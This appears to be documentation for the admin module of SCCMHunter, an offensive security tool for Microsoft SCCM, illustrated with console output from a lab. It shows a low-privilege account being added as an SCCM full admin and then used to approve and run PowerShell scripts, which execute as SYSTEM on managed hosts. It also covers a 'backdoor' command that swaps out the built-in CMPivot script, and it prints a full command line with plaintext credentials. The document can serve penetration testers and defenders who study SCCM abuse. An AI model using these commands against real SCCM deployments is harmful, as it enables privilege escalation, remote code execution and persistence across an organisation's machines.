Admin Management Commands
add_admin
Description
Add a provided account as a site server admin. This is useful for the scripts module where SCCM is configured to require a secondary account for script approval (default setting). The account type is not limited to a traditional user account and can be a machine.
Usage
add_admin [username] [sid]
Example
() (C:\) >> show_admins
[22:47:42] INFO Tasked SCCM to list current SMS Admins.
[22:47:43] INFO Current Full Admin Users:
[22:47:43] INFO LAB\Administrator
() (C:\) >> add_admin lowpriv S-1-5-21-4004054868-2969153893-1580793631-1113
[22:47:47] INFO Tasked SCCM to add lowpriv as an administrative user.
[22:47:49] INFO [+] Successfully added lowpriv as an admin.
() (C:\) >> show_admins
[22:47:51] INFO Tasked SCCM to list current SMS Admins.
[22:47:52] INFO Current Full Admin Users:
[22:47:52] INFO LAB\Administrator
[22:47:52] INFO lowpriv
() (C:\) >>
delete_admin
Description
Remove a target administrator account from SCCM. Note: cannot be performed against itself.
Usage
You cannot remove your own administrative account using this command.
show_admins
Description
Show the current SCCM admin accounts.
Usage
Example
() C:\ >> show_admins
[22:13:53] INFO Tasked SCCM to list current SMS Admins.
[22:13:53] INFO Current Full Admin Users:
[22:13:53] INFO LAB\Administrator
() (C:\) >>
show_rbac
Description
List users and their roles within the SCCM RBAC system.
Usage
show_consoleconnections
Description
List console sessions and their source connections.
Usage
Script Management Commands
script
Description
Execute a provided PowerShell script on a target host. The script is intended to be self-deleting from the remote host as well as from the site database. If the hierarchy is configured to require script approval (default) alternate credentials must be specified to approve the script. Alternate credentials can be obtained by using the add_admin command to add a secondary account as an administrator.
Usage
Examples
Script approval not required
When script approval is not required, scripts execute directly.
Script approval required
When script approval is required, you need alternate credentials.
Script execution fails without alternate credentials:
(16777221) (C:\) >> script /root/test.txt
[22:57:31] INFO [+] Updates script created successfully with GUID c6006c4a-5590-4cac-9b49-48b86e80064f.
[22:57:35] INFO [-] Hierarchy settings do not allow author's to approve their own scripts. All custom script execution will fail.
[22:57:35] INFO [*] Try using alternate approval credentials.
[22:57:38] INFO [+] Script with GUID c6006c4a-5590-4cac-9b49-48b86e80064f deleted.
(16777221) (C:\) >>
(16777221) (C:\) >> exit
┌──(root㉿kali)-[/opt/sccmhunter]
└─# python3 sccmhunter.py admin -u lab\\administrator -p P@ssw0rd -ip 10.10.100.9 -au lowpriv -ap P@ssw0rd -debug
SCCMHunter vdev0.0.3 by @garrfoster
[14:13:07] DEBUG [*] Database built.
[14:13:07] INFO [!] Enter help for extra shell commands
() C:\ >> shell nano /root/test.txt
() (C:\) >> interact 16777221
(16777221) (C:\) >> script /root/test.txt
[14:13:36] INFO [+] Updates script created successfully with GUID 405cde91-bb42-4d2f-9acd-7b3b3789ccd4.
[14:13:36] DEBUG [*] Using alternate credentials to approve script.
[14:13:38] INFO [+] Script with guid 405cde91-bb42-4d2f-9acd-7b3b3789ccd4 approved.
[14:13:40] INFO [+] Script with guid 405cde91-bb42-4d2f-9acd-7b3b3789ccd4 executed.
[14:13:40] DEBUG [+] Got OperationID: 16779568
[14:13:58] INFO [+] Got result:
[14:13:58] INFO nt authority\\system
[14:13:59] INFO [+] Script with GUID 405cde91-bb42-4d2f-9acd-7b3b3789ccd4 deleted.
(16777221) (C:\) >>
list_scripts
Description
List scripts stored on the SCCM server.
Usage
delete_script
Description
Delete a script from the SCCM server using its GUID.
Usage
CMPivot Script Management Commands
The following CMPivot script management commands are still in beta and not recommended for use in production environments.
backup
Description
Performs a backup of the existing built-in CMPivot script. Required prior to any manipulation of the CMPivot script.
Usage
Example
(16777221) (C:\Users\) >> shell ls -l /root/.sccmhunter/logs/
total 232
-rw-r--r-- 1 root root 214176 Feb 7 23:35 console.log
drwxr-xr-x 2 root root 4096 Feb 6 22:02 csvs
drwxr-xr-x 2 root root 4096 Feb 7 19:59 db
drwxr-xr-x 2 root root 4096 Feb 6 22:02 json
drwxr-xr-x 2 root root 4096 Feb 6 22:02 loot
(16777221) (C:\Users\) >> backup
[23:38:11] INFO Tasked SCCM to backup the CMPivot script.
[23:38:14] INFO [+] Backup created successfully.
(16777221) (C:\Users\) >> shell ls -l /root/.sccmhunter/logs/
total 280
-rw-r--r-- 1 root root 48651 Feb 7 23:38 cmpivot_backup.ps1
-rw-r--r-- 1 root root 214176 Feb 7 23:35 console.log
drwxr-xr-x 2 root root 4096 Feb 6 22:02 csvs
drwxr-xr-x 2 root root 4096 Feb 7 19:59 db
drwxr-xr-x 2 root root 4096 Feb 6 22:02 json
drwxr-xr-x 2 root root 4096 Feb 6 22:02 loot
backdoor
Description
Replace the built-in CMPivot script stored in the site server database with a user supplied script. This command will not run unless a backup exists for the script to ensure the operator is able to undo/restore the backdoored script.
Usage
backdoor [/path/to/script]
Example
(16777221) (C:\Users\) >> backdoor /root/test.txt
[23:34:54] INFO Tasked SCCM to backdoor CMPivot with provided script
IMPORTANT: Did you backup the script first? There is no going back without it. Y/N?Y
[23:34:59] INFO [+] CMPivot script updated successfully.
[23:35:01] INFO [+] CMPivot script approved.
restore
Description
Restore a modified CMPivot script to its previous state.
Usage
Example
(16777221) (C:\Users\) >> restore
[23:35:05] INFO Tasked SCCM to restore the original CMPivot script.
[23:35:06] INFO [+] CMPivot script updated successfully.
[23:35:07] INFO [+] CMPivot script approved.
Administrative tasks require appropriate SCCM permissions. Script operations may require alternate approval credentials depending on your SCCM hierarchy configuration.
